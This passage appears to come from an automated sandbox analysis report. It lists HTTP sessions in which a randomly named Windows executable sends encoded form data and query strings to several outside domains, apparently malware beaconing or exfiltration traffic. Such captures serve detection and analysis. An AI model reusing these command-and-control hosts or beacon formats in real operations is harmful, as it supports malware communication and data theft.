                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 7a 31 78 62 74 72 77 78 67 37 30 67 4b 33 77 69 47 52 34 54 47 61 4b 4c 56 56 4f 47 4d 6b 64 79 47 6e 73 41 49 49 64 62 71 4f 69 46 30 55 76 53 2f 77 77 31 61 42 64 4b 4c 75 51 62 50 55 66 4d 68 68 6e 2f 70 59 56 43 56 79 69 51 6c 31 55 78 6d 58 4b 79 58 69 56 6e 6d 79 6b 44 4a 62 44 4c 32 43 46 44 4a 74 6e 6b 55 6f 34 58 32 79 4d 68 72 47 4c 34 4a 54 48 34 4e 58 4c 51 44 31 68 76 46 79 39 37 2b 58 49 74 67 53 53 70 5a 65 67 73 79 70 68 67 50 46 53 5a 68 50 78 67 30 59 46 47 61 43 62 [TRUNCATED]
                                                                      Data Ascii: 88v07=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39Iz1xbtrwxg70gK3wiGR4TGaKLVVOGMkdyGnsAIIdbqOiF0UvS/ww1aBdKLuQbPUfMhhn/pYVCVyiQl1UxmXKyXiVnmykDJbDL2CFDJtnkUo4X2yMhrGL4JTH4NXLQD1hvFy97+XItgSSpZegsyphgPFSZhPxg0YFGaCb5gzalH+aNX2hbe3sc2ShpFXzVkL+qNANmVIqSebP5vkkQMUY+q8d2RagmCk4LoETyCfbFQ8IU8OQVHmNX05eFtjQVEQkmJKQsUm9i0HFoK5+nV8ExJOxHZqNV4RiQBSY0teIfWMI98QYWIg9w2IFcSy/sFzPbcCODs6S7UN+7JVdDDD0cZ5TpSJ5xThuUufuzmVehP5ETJzKs/y0t9TqIwhq58/IAhqBFQQL0R3U5bqNUsakWYAn74muHSQzDBGZ/e2WaoCj/5p630kGX+buquO08aEQyif4+LTt/aqIM82Daw8dI+z7jD532hJdDtZUC4S1DQN3+uEp78qJFLZOzLE/f85lzD5oZln/lL4LIXA+6xV58nJRqZfjGkw0Z1loHWIGMxNh0ujn7Tc3BCCRl+TTghqqg1gkFm6+X62geWV0e2z67UTbt1OIP5f9i3hB7ohMv47mkJoJWEt76C/YvOUh3Z1fbeQw2DXq1tvsPBM59zDWIyQ4B8v62LmTdrb5FGjDeztJNgJmCxNsXxYdeHVPTD3azhJNcNZA3grOox1Pt1rCcAZnAeUodAXYzby6Ou9OZsgtW7DBHEgai89Qh+JbgCYz1vwikx1EwAJKAF35t3LUCdV8h6UaVwAprZ7gs36a8VdtXkEiSEdMQ1D6kROVgcNZVCijnB [TRUNCATED]
                                                                      Jan 13, 2025 09:40:05.471097946 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:40:05 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.450019199.192.21.169805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:07.384577036 CET468OUTGET /bowc/?O2=aP0Tt&88v07=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.lonfor.website
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:40:08.169625044 CET933INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:40:07 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.450020154.197.162.239805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:13.554389000 CET746OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 54 51 7a 62 56 42 59 2b 65 78 64 30 42 75 42 54 6b 35 6c 51 4c 47 63 33 5a 37 33 43 71 6e 65 4e 67 3d 3d
                                                                      Data Ascii: 88v07=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIITQzbVBY+exd0BuBTk5lQLGc3Z73CqneNg==
                                                                      Jan 13, 2025 09:40:14.129829884 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 16:39:38 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.450021154.197.162.239805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:16.165165901 CET766OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 69 76 71 65 79 44 50 70 61 58 57 72 65 47 54 70 6b 56 55 44 74 6c 32 63 4a 2f 75 68 64 50 30 42 34 3d
                                                                      Data Ascii: 88v07=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLivqeyDPpaXWreGTpkVUDtl2cJ/uhdP0B4=
                                                                      Jan 13, 2025 09:40:16.701747894 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 16:39:41 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.450022154.197.162.239805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:18.720616102 CET10848OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 73 2b 2b 44 57 6c 52 6b 49 31 44 4b 2b 79 76 63 61 45 43 35 4f 4b 52 4b 57 74 44 73 77 4a 4b 6a 34 4d 39 50 63 53 78 56 68 33 75 47 72 42 55 74 4d 70 55 68 66 66 6e 2b 70 6d 51 59 51 6b 31 55 42 73 72 56 7a 2b 54 63 63 38 67 53 45 2f 4e 41 53 41 54 6d 6c 32 50 58 62 38 55 46 37 45 75 45 7a 62 44 35 53 66 36 34 47 55 74 44 4a 68 68 4f 2f 41 6a 76 6d 51 74 59 49 43 56 53 52 54 70 73 33 32 4c 4e 44 54 76 43 77 37 38 30 6a 67 32 45 4b 6e 62 56 6c 54 72 71 4c 73 45 6f 43 4c 6e 66 39 78 [TRUNCATED]
                                                                      Data Ascii: 88v07=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/s++DWlRkI1DK+yvcaEC5OKRKWtDswJKj4M9PcSxVh3uGrBUtMpUhffn+pmQYQk1UBsrVz+Tcc8gSE/NASATml2PXb8UF7EuEzbD5Sf64GUtDJhhO/AjvmQtYICVSRTps32LNDTvCw780jg2EKnbVlTrqLsEoCLnf9x8785R6tF7CxlXwtVKv2wYhnTx8Za6h9L0sYMdg4toOYSxh6w5d8XOLnTp3qn+LSpun//lGFCGfBRLtsqTODD1paTkc684NnQxxmrS1lj3chZJiCOF9dyV9BbkvAmeu8QCPqWD+yVM1Y0eg4Rr47ZVM1Qk85ASI2YeqwVuOq4NabLKr/lrca7X1CWPGOAmLgbjX7hAe23NPSkVWAv9To7YTRo02L3/zhYWC+YfNgVZR/rPMGafLGgC2ll9d86TIhIHr7qc5DiyicgUG1gZziaep0VmsarGJv4FUj+MzpDG384YxW8RH4ZK/ua9jisoARvumytDoufwKrHhypBPHk6JDr7kfPFkXHWqyITJXWNiWFG92nnFVXaCQGXfay0sLD2djxasVqQaDIqzCc7QvE6NH1yk4hrhZdu+9NEcVyNDiecdg5fmI5le4lgrNxuPBUY92WwJD4Z6wPv14tNNFD2OOBDUOp5lFuVLJS1drhMhljoY88aB7pBXMcnR4h3RH9F5Z7uTEbNaVgIo91tou+hMtHx91Q4oE5+jssXTG18glLoMx1AYliSpMSuYQyoj6nO6tC7Uax8uhBc6jXwEJgS0nm9VT160Ukc2WYdRapqqRn+1Qohy69vVgqyvKoMzU+pza/CfJVAV+mxSjEGjzW7uFFgdnBcsyHGma [TRUNCATED]
                                                                      Jan 13, 2025 09:40:19.375875950 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 16:39:43 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.450023154.197.162.239805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:21.268678904 CET470OUTGET /cf9p/?88v07=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.investshares.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:40:21.840183020 CET141INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 16:39:46 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.45002484.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:26.925324917 CET755OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4b 4c 72 6f 44 47 36 4b 2b 66 67 37 4a 6e 49 6b 31 45 30 30 53 2f 5a 73 57 4b 37 76 5a 53 6d 31 57 77 44 68 37 52 38 41 51 68 6b 4a 4b 7a 33 72 4a 64 75 44 4e 63 74 33 6b 54 6d 6d 38 50 69 4c 4b 47 46 62 30 67 4c 36 46 2b 47 47 6c 55 48 37 4f 50 42 6d 77 4b 74 6a 37 78 63 52 2f 56 4c 76 76 45 75 4d 74 59 6e 2b 73 6a 48 50 33 70 75 35 5a 71 62 47 47 65 2f 2f 70 73 52 79 36 64 4e 2f 43 62 64 53 34 2b 61 4d 51 33 64 4a 36 44 46 42 68 66 2f 51 30 6e 4e 69 4c 7a 56 57 69 47 4b 52 65 31 50 32 42 6d 70 4b 69 77 44 37 58 73 77 4e 4e 31 6f 7a 61 77 3d 3d
                                                                      Data Ascii: 88v07=+VcDzAN33NkKKLroDG6K+fg7JnIk1E00S/ZsWK7vZSm1WwDh7R8AQhkJKz3rJduDNct3kTmm8PiLKGFb0gL6F+GGlUH7OPBmwKtj7xcR/VLvvEuMtYn+sjHP3pu5ZqbGGe//psRy6dN/CbdS4+aMQ3dJ6DFBhf/Q0nNiLzVWiGKRe1P2BmpKiwD7XswNN1ozaw==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.45002584.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:29.467694044 CET775OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 43 31 57 55 48 68 36 56 6f 41 52 68 6b 4a 46 54 33 75 45 39 75 59 4e 63 68 46 6b 54 71 6d 38 50 32 4c 4b 48 31 62 30 58 6e 35 55 2b 47 41 71 30 48 31 44 76 42 6d 77 4b 74 6a 37 78 68 2b 2f 55 6a 76 75 30 65 4d 75 35 6e 78 6d 44 48 4d 79 70 75 35 64 71 62 43 47 65 2b 53 70 70 78 4d 36 65 31 2f 43 62 74 53 34 76 61 50 61 33 63 4d 30 6a 46 52 68 4b 4b 37 39 6c 6f 2b 49 67 35 66 6a 58 4b 41 66 7a 43 73 51 58 49 64 77 77 6e 49 4b 72 35 35 41 32 56 36 42 39 4e 41 63 76 39 50 4e 78 6b 38 64 39 57 72 50 2f 67 79 36 78 59 3d
                                                                      Data Ascii: 88v07=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgC1WUHh6VoARhkJFT3uE9uYNchFkTqm8P2LKH1b0Xn5U+GAq0H1DvBmwKtj7xh+/Ujvu0eMu5nxmDHMypu5dqbCGe+SppxM6e1/CbtS4vaPa3cM0jFRhKK79lo+Ig5fjXKAfzCsQXIdwwnIKr55A2V6B9NAcv9PNxk8d9WrP/gy6xY=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
